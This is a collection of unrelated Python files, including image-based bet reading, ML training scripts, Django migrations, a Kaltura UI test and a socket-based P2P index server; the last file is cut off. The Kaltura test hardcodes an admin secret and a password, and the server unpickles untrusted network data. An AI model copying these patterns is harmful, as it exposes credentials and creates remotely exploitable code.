def add_spaces_to_digits(self, image_grey_array, digit_group_contours, digit_width=5, fill_color=0):
if digit_group_contours is None or len(digit_group_contours) <= 1:
logger.warning("Not enough digit groups")
return
right_x = np.max(digit_group_contours[-1].points_array[:, 1])
left_dollar_sign = np.min(digit_group_contours[-1].points_array[:, 1])
left_x = np.min(digit_group_contours[0].points_array[:, 1])
if digit_width == 6:
right_x = int(round(right_x+0.4))
else:
right_x = int(round(right_x))
left_x = int(round(left_x))
if right_x-left_dollar_sign > 2*digit_width:
# we didn't actually detect a $ sign, so we just assume the right most group are 3 digits
x_to_insert_blank_line = right_x
else:
# account for the $ sign and an extra space
x_to_insert_blank_line = right_x - digit_width - 1
seps_added = 0
while x_to_insert_blank_line > left_x:
image_grey_array = np.insert(image_grey_array, obj=x_to_insert_blank_line,
values=fill_color, axis=1)
x_to_insert_blank_line -= digit_width
seps_added += 1
# each group of 3 gets an extra space
if seps_added % 3 == 0:
if digit_width == 6:
x_to_insert_blank_line -= 3
else:
x_to_insert_blank_line -= 1
return image_grey_array
@timeit
def get_bets(self, game_area_image_array):
bet_image_array = cfg.BETS_AREA.clip_2d_array(game_area_image_array)
#display_image_with_contours(bet_image_array, [])
# get just green component
# display_image_with_contours(bet_image_array, [])
# Basically we just want green things, so...
# take max of red and blue columns (indexs 0 and 2)
max_red_blue_value = np.max(bet_image_array[:, :, [0, 2]], axis=2)
# build a boolean array of green values that are less than the max of red or blue
cond = bet_image_array[:, :, 1] < max_red_blue_value
# for those pixels where green not the max, set it to 0, otherwise subtract the max
bet_image_array[:, :, 1] = np.where(cond, 0, bet_image_array[:, :, 1] - max_red_blue_value)
# now we just have a picture of green things
image_array = bet_image_array[:, :, 1].copy()
bet_bubbles = find_contours(grey_array=image_array,
min_width=30,
max_width=100,
min_height=9,
# Sometimes green chips can make height larger
max_height=35,
display=False
)
bet_bubbles = sorted(bet_bubbles, key=lambda x: x.bounding_box.min_x)
#display_image_with_contours(image_array, [b.points_array for b in bet_bubbles])
all_bets = [0] * 5
center_bet_area_yx = bet_image_array.shape[0] / 2, bet_image_array.shape[1] / 2
for contour in bet_bubbles:
# logger.info(contour.bounding_box)
just_text = contour.bounding_box.clip_2d_array(image_array)
center_bet_yx = list(contour.bounding_box.center_yx())
center_bet_yx[0] -= center_bet_area_yx[0]
center_bet_yx[1] -= center_bet_area_yx[1]
player_position = None
if abs(center_bet_yx[0]) < 75 and abs(center_bet_yx[1]) < 15:
player_position = 0
elif center_bet_yx[0] > 0 and center_bet_yx[1] < 0:
player_position = 1
elif center_bet_yx[0] < 0 and center_bet_yx[1] < 0:
player_position = 2
elif center_bet_yx[0] < 0 and center_bet_yx[1] > 0:
player_position = 3
elif center_bet_yx[0] > 0 and center_bet_yx[1] > 0:
player_position = 4
else:
raise Exception("cain")
# clip off 4 leftmost pixels which are giving false contours
just_text_grey_array = just_text[:, 4:]
digit_group_contours = find_contours(grey_array=just_text_grey_array,
**cfg.OTHER_PLAYER_BET_DIGIT_GROUP_CONFIG,
display=False
)
digit_group_contours = list(digit_group_contours)
#display_image_with_contours(just_text_grey_array, [c.points_array for c in digit_group_contours])
bet_image_grey_array = self.add_spaces_to_digits(
image_grey_array=just_text_grey_array,
digit_group_contours=digit_group_contours,
digit_width=6,
fill_color=255
)
digit_contours = find_contours(grey_array=bet_image_grey_array,
**cfg.OTHER_PLAYER_BET_CONTOUR_CONFIG,
display=False
)
digit_contours = list(digit_contours)
# display_image_with_contours(bet_image_grey_array, [c.points_array for c in digit_contours])
this_bet_value = self._digit_contours_to_integer(digit_contours)
if this_bet_value is not None:
logger.info(f"Found bet {this_bet_value}. Players position: {player_position}")
logger.debug(
"Bet area center: {}. Bet center: {} ".format(
center_bet_area_yx,
center_bet_yx))
#display_image_with_contours(bet_image_grey_array, [c.points_array for c in digit_contours])
all_bets[player_position] = this_bet_value
return all_bets
|
def read_out(acrostic):
return "".join([x[0] for x in acrostic])
'''
An acrostic is a text in which the first letter of each line spells out a word.
It is also a quick and cheap way of writing a poem for somebody, as exemplified below:
Write a program that reads an acrostic to identify the "hidden" word. Specifically,
your program will receive a list of words (reprensenting an acrostic) and will need
to return a string corresponding to the word that is spelled out by taking the first
letter of each word in the acrostic.
'''
|
# Generated by Django 3.1.5 on 2021-01-22 13:10
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('processer', '0003_remove_video_firstframe'),
]
operations = [
migrations.AddField(
model_name='video',
name='upload_at',
field=models.DateTimeField(default=django.utils.timezone.now),
),
migrations.AddField(
model_name='video',
name='upload_by',
field=models.CharField(default='', max_length=150),
),
]
|
#获取分数
score = int(input('请输入你的分数(0-100)'))
if score >= 90:
print('A')
elif score>=80 and score<90:
print('B')
elif score>=70 and score<80:
print('C')
elif score>=60 and score<70:
print('D')
elif score>=0 and score<60:
print('E')
else:
print('输入错误')
|
#!/usr/bin/env python
# Copyright (c) 2015 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Make sure that the (custom) NoImportLibrary flag is handled correctly.
"""
import TestGyp
import os
import sys
if sys.platform == 'win32':
test = TestGyp.TestGyp(formats=['ninja'])
CHDIR = 'importlib'
test.run_gyp('noimplib.gyp', chdir=CHDIR)
test.build('noimplib.gyp', test.ALL, chdir=CHDIR)
# The target has an entry point, but no exports. Ordinarily, ninja expects
# all DLLs to export some symbols (with the exception of /NOENTRY resource-
# only DLLs). When the NoImportLibrary flag is set, this is suppressed. If
# this is not working correctly, the expected .lib will never be generated
# but will be expected, so the build will not be up to date.
test.up_to_date('noimplib.gyp', test.ALL, chdir=CHDIR)
test.pass_test()
|
import math
import stl
from stl import mesh
import numpy
import glob
def combine_stl(data_dir):
'''This function combines all the STL file in a directory and merges them together'''
#storing all the stl file in a directory
stl_dir = 'data_dir/*.stl'
#Creating an Empty mesh to concatenate all the stl file in a directory
data = numpy.zeros(0, dtype=mesh.Mesh.dtype)
combine = mesh.Mesh(data, remove_empty_areas=False)
files = glob.glob(stl_dir)
for fl in files:
stl_fl = mesh.Mesh.from_file(fl)
combine = mesh.Mesh(numpy.concatenate([stl_fl.data, combine.data]))
combine.save('combine.stl', mode=stl.Mode.ASCII)
|
# class 1
# 7/11/16
# Write a function that takes an input and does something with it
# Variables, inputs, basic methods
# radius of a circle
input_value = input("Enter a radius:")
radius = float(input_value)
area = 3.14159 * radius * radius
print("The area of a circle with radius " + input_value + " is: " + str(area))
# convert mm to diopters
input_val = input("Enter a focal length in mm: ")
focal_length = float(input_val)
diopters = 100 / focal_length
print("The dioptric value for a " + input_val + "mm focal length is: " + str(diopters) + "D")
# favorite tea
input_val = input("What is your favorite type of tea? ")
if (input_val.lower() == 'rooibos'):
print("Rooibos is also my favorite type of tea!")
else:
print(input_val + "sounds great!") |
"""
Main file
We will run the whole program from here
"""
import torch
import hydra
from train import train
from dataset import VQADataset
from models.base_model import VQAModel
from torch.utils.data import DataLoader
from utils import main_utils, train_utils
from utils.train_logger import TrainLogger
from omegaconf import DictConfig, OmegaConf
torch.backends.cudnn.benchmark = True
@hydra.main(config_path="config", config_name='config')
def main(cfg: DictConfig) -> None:
"""
Run the code following a given configuration
:param cfg: configuration file retrieved from hydra framework
"""
main_utils.init(cfg)
logger = TrainLogger(exp_name_prefix=cfg['main']['experiment_name_prefix'], logs_dir=cfg['main']['paths']['logs'])
logger.write(OmegaConf.to_yaml(cfg))
# Set seed for results reproduction
main_utils.set_seed(cfg['main']['seed'])
# Load dataset
path_image_train = '/datashare/train2014/COCO_train2014_'
path_question_train = '/datashare/v2_OpenEnded_mscoco_train2014_questions.json'
train_dataset = VQADataset(path_answers=cfg['main']['paths']['train'],
path_image=path_image_train, path_questions=path_question_train)
path_image_val = '/datashare/val2014/COCO_val2014_'
path_question_val = '/datashare/v2_OpenEnded_mscoco_val2014_questions.json'
val_dataset = VQADataset(path_answers=cfg['main']['paths']['validation'], path_image=path_image_val,
path_questions=path_question_val, word_dict=train_dataset.word_dict)
train_loader = DataLoader(train_dataset, cfg['train']['batch_size'], shuffle=True,
num_workers=cfg['main']['num_workers'])
eval_loader = DataLoader(val_dataset, cfg['train']['batch_size'], shuffle=True,
num_workers=cfg['main']['num_workers'])
image_dim = train_dataset.pic_size
output_dim =2410 # possible answers
model = VQAModel(batch_size=cfg['train']['batch_size'], word_vocab_size=train_dataset.vocab_size,
lstm_hidden=cfg['train']['num_hid'], output_dim=output_dim, dropout=cfg['train']['dropout'],
word_embedding_dim=cfg['train']['word_embedding_dim'], question_output_dim = cfg['train']['question_output_dim'],
image_dim= image_dim, last_hidden_fc_dim= cfg['train']['last_hidden_fc_dim'])
if cfg['main']['parallel']:
model = torch.nn.DataParallel(model)
if torch.cuda.is_available():
model = model.cuda()
logger.write(main_utils.get_model_string(model))
# Run model
train_params = train_utils.get_train_params(cfg)
# Report metrics and hyper parameters to tensorboard
metrics = train(model, train_loader, eval_loader, train_params, logger)
hyper_parameters = main_utils.get_flatten_dict(cfg['train'])
logger.report_metrics_hyper_params(hyper_parameters, metrics)
if __name__ == '__main__':
main()
|
import os
from keras.preprocessing.image import ImageDataGenerator
from keras.models import Sequential, Model
from keras.layers import Input, Activation, Dropout, Flatten, Dense
from keras import callbacks
from keras import optimizers
import numpy as np
from resnet import ResnetBuilder
batch_size = 300
num_classes = 3
img_rows, img_cols = 30, 30
channels = 3
train_data_dir = './train_data/'
validation_data_dir = './val_data/'
log_filepath = './log/'
num_train_samples = 100000
num_val_samples = 20000
num_epoch = 100
result_dir = './result/'
if not os.path.exists(result_dir):
os.mkdir(result_dir)
if __name__ == '__main__':
# Resnet50モデルを構築
input_shape = [3, 30, 30]
resnet50 = ResnetBuilder.build_resnet_50(input_shape, num_classes)
model = Model(input=resnet50.input, output=resnet50.output)
# SGD+momentumがいいらしい
model.compile(loss='categorical_crossentropy',
optimizer=optimizers.SGD(lr=1e-2, decay=1e-6, momentum=0.9, nesterov=True),
metrics=['accuracy'])
datagen = ImageDataGenerator(data_format="channels_first")
train_generator = datagen.flow_from_directory(
train_data_dir,
target_size=(img_rows, img_cols),
color_mode='rgb',
class_mode='categorical',
batch_size=batch_size,
shuffle=True)
validation_generator = datagen.flow_from_directory(
validation_data_dir,
target_size=(img_rows, img_cols),
color_mode='rgb',
class_mode='categorical',
batch_size=batch_size,
shuffle=True)
cp_cb = callbacks.ModelCheckpoint(
filepath = './result/model{epoch:02d}-loss{loss:.2f}-acc{acc:.2f}-vloss{val_loss:.2f}-vacc{val_acc:.2f}.h5',
monitor='val_loss',
verbose=1,
save_best_only=False,
mode='auto')
tb_cb = callbacks.TensorBoard(
log_dir=log_filepath,
histogram_freq=0,
write_graph=True,
write_images=True)
history = model.fit_generator(
train_generator,
samples_per_epoch=num_train_samples,
nb_epoch=num_epoch,
callbacks=[cp_cb, tb_cb],
validation_data=validation_generator,
nb_val_samples=num_val_samples)
model.save_weights(os.path.join(result_dir, 'trained_model.h5'))
save_history(history, os.path.join(result_dir, 'history.txt')) |
import pandas as pd
def to_reise(data):
"""Format data for REISE.
:param pandas.DataFrame data: data frame as returned by
:func:`prereise.gather.winddata.rap.rap.retrieve_data`.
:return: (*pandas.DataFrame*) -- data frame formatted for REISE.
"""
ts = data["ts"].unique()
plant_id = data[data.ts_id == 1].plant_id.values
profile = None
for i in range(1, max(data.ts_id) + 1):
data_tmp = pd.DataFrame(
{"Pout": data[data.ts_id == i].Pout.values}, index=plant_id
)
if i == 1:
profile = data_tmp.T
else:
profile = profile.append(data_tmp.T, sort=False, ignore_index=True)
profile.set_index(ts, inplace=True)
profile.index.name = "UTC"
return profile
|
from django.urls import path
from .views import certPost, certDetailView, certUpdate, toProxyView
app_name ='manager'
info_post = certPost.as_view({
'post': 'create',
})
detail = certDetailView.as_view({
'get': 'list',
})
info_update = certUpdate.as_view({
'post': 'partial_update',
})
urlpatterns = [
path('', detail, name='certDetailView'),
path('add/', info_post, name='certPost'),
path('update/<pk>', info_update, name='certUpdate'),
path('userpattern/', toProxyView.as_view(), name='toproxy'),
] |
"""Helper modules for spectrum SimSUSY-based spectrum generators."""
|
# -*- coding: utf-8 -*-
"""
pelesent
~~~~~~~~~~~~~~~~~~~
Sentiment analysis from pelenudos to pelenudos
:copyright: (c) 2017 by Marcos Treviso
:licence: MIT, see LICENSE for more details
"""
from __future__ import absolute_import, unicode_literals
import logging
import theano
theano.config.floatX = 'float32' # XXX: has to come before loading anything related to Theano or Keras
# Generate your own AsciiArt at:
# patorjk.com/software/taag/#f=Calvin%20S&t=PeleSent
__banner__ = r"""
╔═╗┌─┐┬ ┌─┐╔═╗┌─┐┌┐┌┌┬┐
╠═╝├┤ │ ├┤ ╚═╗├┤ │││ │
╩ └─┘┴─┘└─┘╚═╝└─┘┘└┘ ┴
"""
__prog__ = 'pelesent'
__title__ = 'PeleSent'
__summary__ = 'Sentiment analysis from pelenudos to pelenudos.'
__uri__ = 'https://www.github.com/mtreviso/pelesent'
__version__ = '0.0.1-alpha'
__author__ = 'Marcos Treviso'
__email__ = 'marcostreviso@usp.br'
__license__ = 'MIT'
__copyright__ = 'Copyright 2017 Marcos Treviso'
# the user should dictate what happens when a logging event occurs
logging.getLogger(__name__).addHandler(logging.NullHandler())
|
import numpy as np
import os
import re
from random import shuffle
import tensorflow as tf
import matplotlib.pyplot as plt
import matplotlib.gridspec as gridspec
from mpl_toolkits import mplot3d
import random
class Data:
def __init__(self,config):
self.config = config
self.train_batch_index = 0
self.test_seq_index = 0
self.resolution = config['resolution']
self.batch_size = config['batch_size']
self.train_names = config['train_names']
self.test_names = config['test_names']
self.X_train_files, self.Y_train_files = self.load_X_Y_files_paths_all( self.train_names,label='train')
self.X_test_files, self.Y_test_files = self.load_X_Y_files_paths_all(self.test_names,label='test')
print "X_train_files:",len(self.X_train_files)
print "X_test_files:",len(self.X_test_files)
self.total_train_batch_num = int(len(self.X_train_files) // self.batch_size) -1
self.total_test_seq_batch = int(len(self.X_test_files) // self.batch_size) -1
self.batch_name = 'batchname'
@staticmethod
def output_Voxels(name, voxels):
if len(voxels.shape)>3:
x_d = voxels.shape[0]
y_d = voxels.shape[1]
z_d = voxels.shape[2]
v = voxels[:,:,:,0]
v = np.reshape(v,(x_d,y_d,z_d))
else:
v = voxels
x, y, z = np.where(v > 0.5)
wfile = open(name+'.asc','w')
for i in range(len(x)):
data = str(x[i]) +' '+ str(y[i]) +' '+ str(z[i])
wfile.write(data + '\n')
wfile.close()
@staticmethod
def plotFromVoxels(name, voxels):
if len(voxels.shape)>3:
x_d = voxels.shape[0]
y_d = voxels.shape[1]
z_d = voxels.shape[2]
v = voxels[:,:,:,0]
v = np.reshape(v,(x_d,y_d,z_d))
else:
v = voxels
#x, y, z = v.nonzero()
x, y, z = np.where(v > 0.5)
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.scatter(x, y, z, zdir='z', c='red')
plt.savefig(name)
plt.close()
#plt.show()
def load_X_Y_files_paths_all(self, obj_names, label='train'):
x_str=''
y_str=''
if label =='train':
x_str='X_train_'
y_str ='Y_train_'
elif label == 'test':
x_str = 'X_test_'
y_str = 'Y_test_'
else:
print "label error!!"
exit()
X_data_files_all = []
Y_data_files_all = []
for name in obj_names:
X_folder = self.config[x_str + name]
Y_folder = self.config[y_str + name]
X_data_files, Y_data_files = self.load_X_Y_files_paths(X_folder, Y_folder)
for X_f, Y_f in zip(X_data_files, Y_data_files):
if X_f[0:15] != Y_f[0:15]:
print "index inconsistent!!\n"
exit()
X_data_files_all.append(X_folder + X_f)
Y_data_files_all.append(Y_folder + Y_f)
return X_data_files_all, Y_data_files_all
def load_X_Y_files_paths(self,X_folder, Y_folder):
X_data_files = [X_f for X_f in sorted(os.listdir(X_folder))]
Y_data_files = [Y_f for Y_f in sorted(os.listdir(Y_folder))]
return X_data_files, Y_data_files
def load_single_voxel_grid(self,path):
temp = re.split('_', path.split('.')[-2])
x_d = int(temp[len(temp) - 3])
y_d = int(temp[len(temp) - 2])
z_d = int(temp[len(temp) - 1])
a = np.loadtxt(path)
if len(a)<=0:
print " load_single_voxel_grid error: ", path
exit()
voxel_grid = np.zeros((64, 64, 64,1))
for i in a:
voxel_grid[int(i[0]), int(i[1]), int(i[2]),0] = 20 # occupied
return voxel_grid
def load_X_Y_voxel_grids(self,X_data_files, Y_data_files):
if len(X_data_files) !=self.batch_size or len(Y_data_files)!=self.batch_size:
print "load_X_Y_voxel_grids error:", X_data_files, Y_data_files
exit()
X_voxel_grids = []
Y_voxel_grids = []
index = -1
for X_f, Y_f in zip(X_data_files, Y_data_files):
index += 1
X_voxel_grid = self.load_single_voxel_grid(X_f)
X_voxel_grids.append(X_voxel_grid)
Y_voxel_grid = self.load_single_voxel_grid(Y_f)
Y_voxel_grids.append(Y_voxel_grid)
X_voxel_grids = np.asarray(X_voxel_grids)
Y_voxel_grids = np.asarray(Y_voxel_grids)
return X_voxel_grids, Y_voxel_grids
def shuffle_X_Y_files(self, label='train'):
X_new = []; Y_new = []
if label == 'train':
X = self.X_train_files; Y = self.Y_train_files
self.train_batch_index = 0
index = range(len(X))
shuffle(index)
for i in index:
X_new.append(X[i])
Y_new.append(Y[i])
self.X_train_files = X_new
self.Y_train_files = Y_new
elif label == 'test':
X = self.X_test_files; Y = self.Y_test_files
self.test_seq_index = 0
index = range(len(X))
shuffle(index)
for i in index:
X_new.append(X[i])
Y_new.append(Y[i])
self.X_test_files = X_new
self.Y_test_files = Y_new
else:
print "shuffle_X_Y_files error!\n"
exit()
###################### voxel grids
def load_X_Y_voxel_grids_train_next_batch(self):
X_data_files = self.X_train_files[self.batch_size * self.train_batch_index:self.batch_size * (self.train_batch_index + 1)]
Y_data_files = self.Y_train_files[self.batch_size * self.train_batch_index:self.batch_size * (self.train_batch_index + 1)]
self.train_batch_index += 1
self.batch_name = X_data_files
X_voxel_grids, Y_voxel_grids = self.load_X_Y_voxel_grids(X_data_files, Y_data_files)
return X_voxel_grids, Y_voxel_grids
def load_X_Y_voxel_grids_test_next_batch(self,fix_sample=False):
if fix_sample:
random.seed(45)
idx = random.sample(range(len(self.X_test_files)), self.batch_size)
X_test_files_batch = []
Y_test_files_batch = []
for i in idx:
X_test_files_batch.append(self.X_test_files[i])
Y_test_files_batch.append(self.Y_test_files[i])
self.batch_name = X_test_files_batch
X_test_batch, Y_test_batch = self.load_X_Y_voxel_grids(X_test_files_batch, Y_test_files_batch)
return X_test_batch, Y_test_batch
|
import sys,os
sys.path.insert(1,os.path.abspath(os.path.join(os.path.dirname( __file__ ),'..','..','..','lib')))
import time, pytest
from clsCommon import Common
import clsTestService
from localSettings import *
import localSettings
from utilityTestFunc import *
import enums
class Test:
#================================================================================================================================
# @Author: Michal Zomper
# Test Name : Free trial
# Test description:
# create new free trial instance
# In the new instance upload and publish media
#================================================================================================================================
testNum = "653"
supported_platforms = clsTestService.updatePlatforms(testNum)
status = "Pass"
timeout_accured = "False"
driver = None
common = None
# Test variables
entryName = None
entryDescription = "Description"
entryTags = "Tags,"
SearchByInSaaSAdmin = "Hostname"
PartnerID = "2178791"
instanceNumber = None
InstanceSuffix = ".qakmstest.dev.kaltura.com"
AdminSecret = "a884f9a36523cc14e05f265ed9920999"
InstanceId = "MediaSpace"
CompanyName = "Kaltura"
Application = "MediaSpace"
UserID = "qaapplicationautomation@mailinator.com"
Password = "Kaltura1!"
categoryList = [("About Kaltura")]
filePath = localSettings.LOCAL_SETTINGS_MEDIA_PATH + r'\videos\QR_Code_10sec.mp4'
if clsTestService.isAutomationEnv() == True:
instanceNumberFilePath = '/home/local/KALTURA/oleg.sigalov/FreeTrial/FreeTrial.txt'
else:
instanceNumberFilePath = r'Q:\FreeTrial\FreeTrial.txt'
#run test as different instances on all the supported platforms
@pytest.fixture(scope='module',params=supported_platforms)
def driverFix(self,request):
return request.param
def test_01(self,driverFix,env):
#write to log we started the test
logStartTest(self,driverFix)
try:
########################### TEST SETUP ###########################
#capture test start time
self.startTime = time.time()
#initialize all the basic vars and start playing
self,self.driver = clsTestService.initialize(self, driverFix)
self.common = Common(self.driver)
self.entryName = clsTestService.addGuidToString("Free trial", self.testNum)
##################### TEST STEPS - MAIN FLOW #####################
writeToLog("INFO","Step 1: navigate to free trial url form")
self.instanceNumber = self.common.freeTrail.setInstanceNumber(self.instanceNumberFilePath)
if self.instanceNumber == False:
self.status = "Fail"
writeToLog("INFO","Step 1: FAILED to set instance number")
return
writeToLog("INFO","Step 2: navigate to free trial url form")
if self.common.base.navigate("http://qakmstest.dev.kaltura.com/free-trial-test/") == False:
self.status = "Fail"
writeToLog("INFO","Step 2: FAILED navigate to free trail url form: http://qakmstest.dev.kaltura.com/free-trial-test/")
return
writeToLog("INFO","Step 3: create free trial instance")
if self.common.freeTrail.createFreeTrialInctance(self.PartnerID, self.AdminSecret, self.InstanceId, self.CompanyName, self.instanceNumber + self.InstanceSuffix, self.Application) == None:
self.status = "Fail"
writeToLog("INFO","Step 3: FAILED to create free trial instance")
return
sleep(2)
localSettings.LOCAL_SETTINGS_TEST_BASE_URL = "http://"+self.instanceNumber + self.InstanceSuffix
localSettings.LOCAL_SETTINGS_KMS_LOGIN_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + '/user/login'
localSettings.LOCAL_SETTINGS_KMS_MY_MEDIA_URL = localSettings.LOCAL_SETTINGS_TEST_BASE_URL + '/my-media'
writeToLog("INFO","Step 4: navigate to new instance url")
if self.common.base.navigate(localSettings.LOCAL_SETTINGS_TEST_BASE_URL) == False:
self.status = "Fail"
writeToLog("INFO","Step 4: FAILED navigate to instance url: " + localSettings.LOCAL_SETTINGS_TEST_BASE_URL)
return
writeToLog("INFO","Step 5: login to instance")
if self.common.login.loginToKMS(self.UserID, self.Password, localSettings.LOCAL_SETTINGS_KMS_LOGIN_URL) == False:
self.status = "Fail"
writeToLog("INFO","Step 5: FAILED to login to new instance")
return
sleep(2)
writeToLog("INFO","Step 6: Going to upload entry")
if self.common.upload.uploadEntry(self.filePath, self.entryName, self.entryDescription, self.entryTags) == None:
self.status = "Fail"
writeToLog("INFO","Step 6: FAILED failed to upload entry: " + self.entryName)
return
sleep(2)
writeToLog("INFO","Step 7: Going navigate to my media")
if self.common.myMedia.navigateToMyMedia(forceNavigate=True) == False:
self.status = "Fail"
writeToLog("INFO","Step 7: FAILED navigate to my media")
return
writeToLog("INFO","Step 8: Going to navigate to entry page")
if self.common.entryPage.navigateToEntryPageFromMyMedia(self.entryName) == False:
self.status = "Fail"
writeToLog("INFO","Step 8: FAILED navigate to entry page: '" + self.entryName + "'")
return
sleep(2)
writeToLog("INFO","Step 9: Going to publish the entry ")
if self.common.myMedia.publishSingleEntry(self.entryName, self.categoryList, "", publishFrom = enums.Location.ENTRY_PAGE) == False:
self.status = "Fail"
writeToLog("INFO","Step 9: FAILED to publish entry '" + self.entryName + "'")
return
##################################################################
writeToLog("INFO","TEST PASSED: 'Free Trial' was done successfully")
# if an exception happened we need to handle it and fail the test
except Exception as inst:
self.status = clsTestService.handleException(self,inst,self.startTime)
########################### TEST TEARDOWN ###########################
def teardown_method(self,method):
try:
self.common.handleTestFail(self.status)
writeToLog("INFO","**************** Starting: teardown_method ****************")
self.common.myMedia.deleteSingleEntryFromMyMedia(self.entryName)
writeToLog("INFO","**************** Ended: teardown_method *******************")
except:
pass
clsTestService.basicTearDown(self)
#write to log we finished the test
logFinishedTest(self,self.startTime)
assert (self.status == "Pass")
pytest.main('test_' + testNum + '.py --tb=line') |
import socket
import thread
import cPickle as cp
from thread import *
PortOfServer = 7734
SocketOfServer = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
NameOfSocket=socket.gethostbyname(socket.gethostname())
SocketOfServer.setsockopt(socket.SOL_SOCKET,socket.SO_REUSEADDR,1)
SocketOfServer.bind((NameOfSocket, PortOfServer))
SocketOfServer.listen(4)
print 'Server is ready to go.'
PeerDictionary = {}
TitleDictionary = {}
HostDictionary = {}
def AddingToDictionary(hostname, data):
global PeerDictionary
PeerDictionary[hostname] = data
def AddRFCfunc(NumberOfRFC, NameOfClient, PortNumOfClient, TitleOfRFC):
global HostDictionary,TitleDictionary
if NumberOfRFC in TitleDictionary:
RFConHost = HostDictionary.get(NumberOfRFC)
RFConHost=RFConHost+str(NameOfClient) + "-"
HostDictionary[NumberOfRFC] = RFConHost
else:
TitleDictionary[NumberOfRFC] = TitleOfRFC
HostDictionary[NumberOfRFC] = NameOfClient+"-"
def ListRFC(NameOfClient, PortNameOfClient):
global HostDictionary,TitleDictionary,PeerDictionary
listOfRFC=HostDictionary.keys()
if len(listOfRFC)!=0:
message = "P2P-CI/1.0 200 OK"
for rfc in listOfRFC:
ListOfRFChost=HostDictionary.get(rfc)
individualhosts=ListOfRFChost.split('-')
l=len(individualhosts)
for i in range(l-1):
temp = "RFC "+str(rfc)+" "+str(TitleDictionary.get(rfc))+" "+str(individualhosts[i])+" "+str(PortNameOfClient)
message = message + "\r\n" + temp
message=message+"\r\n"
else:
message = "P2P-CI/1.0 404 Not Found\r\n"
return message
def lookupFunc(NumberOfRFC, NameOfClient, PortNumOfClient, TitleOfRFC):
global HostDictionary,TitleDictionary, PeerDictionary,lookupmsg
if NumberOfRFC in TitleDictionary and TitleDictionary[NumberOfRFC] == TitleOfRFC:
lookupmsg = "P2P-CI/1.0 200 OK"
ListOfRFChost = HostDictionary.get(NumberOfRFC)
individualhosts=ListOfRFChost.split('-')
l=len(individualhosts)
for i in range(l-1):
temp = "RFC "+str(NumberOfRFC)+" "+str(TitleOfRFC)+" "+str(individualhosts[0])+" "+str(PortNumOfClient)
lookupmsg = lookupmsg + "\r\n" + temp
lookupmsg=lookupmsg+"\r\n"
else:
lookupmsg = "P2P-CI/1.0 404 Not Found\r\n"
return lookupmsg
def initialization(connection, addr):
global HostDictionary,TitleDictionary,PeerDictionary
data = cp.loads(connection.recv(1024))
hostname=addr[0]+":"+str(data[0])
AddingToDictionary(hostname, data)
while 1:
ReceivedMessage = connection.recv(1024)
ClientMessage = cp.loads(ReceivedMessage)
print 'message received from client for, ' + str(ClientMessage[0])
if ClientMessage[0][0] == 'A':
split = ClientMessage[0].split('\r\n')
print '##########################################'+split[0][split[0].find("C ")+2:split[0].find(" P")]+'######################3'
if 'P2P-CI/1.0' in split[0]:
if len(split) == 5 and "ADD RFC " in split[0] and "Host: " in split[1] and "Port: " in split[2] and "Title: " in split[3]:
NumberOfRFC=split[0][split[0].find("C ")+2:split[0].find(" P")]
NameOfClient=split[1][split[1].find("Host: ")+6:]
PortNumOfClient=split[2][split[2].find("Port: ")+6:]
TitleOfRFC=split[3][split[3].find("Title: ")+7:]
p2p_version=split[0][split[0].find(" P")+1:]
AddRFCfunc(NumberOfRFC, NameOfClient, PortNumOfClient, TitleOfRFC)
message = "P2P-CI/1.0 200 OK\r\n"+split[1]+"\r\n"+split[2]+"\r\n"+split[3]+"\r\n"
connection.send(message)
else:
message="400 Bad Request\r\n"
connection.send(message)
else:
message = "505 P2P-CI Version Not Supported\r\n"
connection.send(message)
elif ClientMessage[0][0] == 'L':
if ClientMessage[0][1] == 'I':
split_data = ClientMessage[0].split('\r\n')
if 'P2P-CI/1.0' in split_data[0]:
if len(split_data) == 4 and "LIST ALL " in split_data[0] and "Host: " in split_data[1] and "Port: " in split_data[2]:
NameOfClient=split_data[1][split_data[1].find("Host: ")+6:]
PortNumOfClient=split_data[2][split_data[2].find("Port: ")+6:]
message=ListRFC(NameOfClient, PortNumOfClient)
connection.send(message)
else:
message="400 Bad Request\r\n"
connection.send(message)
else:
message = "505 P2P-CI Version Not Supported\r\n"
connection.send(message)
elif ClientMessage[0][1] == 'O':
split_data = ClientMessage[0].split('\r\n')
if 'P2P-CI/1.0' in split_data[0]:
print split_data[0]
print split_data[1]
print split_data[2]
print split_data[3]
length_of_split = len(split_data)
if len(split_data) == 5 and "LOOKUP RFC " in split_data[0] and "Host: " in split_data[1] and "Port: " in split_data[2] and "Title: " in split_data[3]:
NumberOfRFC=split_data[0][split_data[0].find("C ")+2:split_data[0].find(" P")]
NameOfClient=split_data[1][split_data[1].find("Host: ")+6:]
PortNumOfClient=split_data[2][split_data[2].find("Port: ")+6:]
TitleOfRFC=split_data[3][split_data[3].find("Title: ")+7:]
print TitleOfRFC
p2p_version=split_data[0][split_data[0].find(" P")+1:]
reqmessage=lookupFunc(NumberOfRFC, NameOfClient, PortNumOfClient, TitleOfRFC)
connection.send(reqmessage)
else:
message="400 Bad Request\r\n"
connection.send(message)
else:
message = "505 P2P-CI Version Not Supported\r\n"
connection.send(message)
elif ClientMessage[0][0] == 'E':
split_data = ClientMessage[0].split('\r\n')
NameOfClient=split_data[1][split_data[1].find("Host: ")+6:]
PortNumOfClient=split_data[2][split_data[2].find("Port: ")+6:]
listOfRFC = HostDictionary.keys()
print "Exit RFC"
for rfc in listOfRFC:
ListOfRFChost = HostDictionary.get(rfc)
individualhosts=ListOfRFChost.split('-')
l=len(individualhosts)
if l==2 and NameOfClient in individualhosts[0]:
TitleDictionary.pop(rfc,None)
HostDictionary.pop(rfc,None)
else:
for i in range(0,l-1):
if NameOfClient in individualhosts[i]:
print NameOfClient
variable = i
individualhosts.remove(NameOfClient)
temp=""
for j in range(0,l-2):
temp=temp+individualhosts[j]+"-"
HostDictionary[rfc] = temp
if PeerDictionary.has_key(NameOfClient):
PeerDictionary.pop(NameOfClient,None)
connection.close()
break
while 1:
connection, addr = SocketOfServer.accept()
print 'Got incoming connection request from ', addr
start_new_thread(initialization, (connection, addr))
SocketOfServer.close()
|
# Generated by Django 2.0.2 on 2019-10-17 13:33
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('products', '0002_auto_20191015_1340'),
]
operations = [
migrations.RenameField(
model_name='product',
old_name='votes_totla',
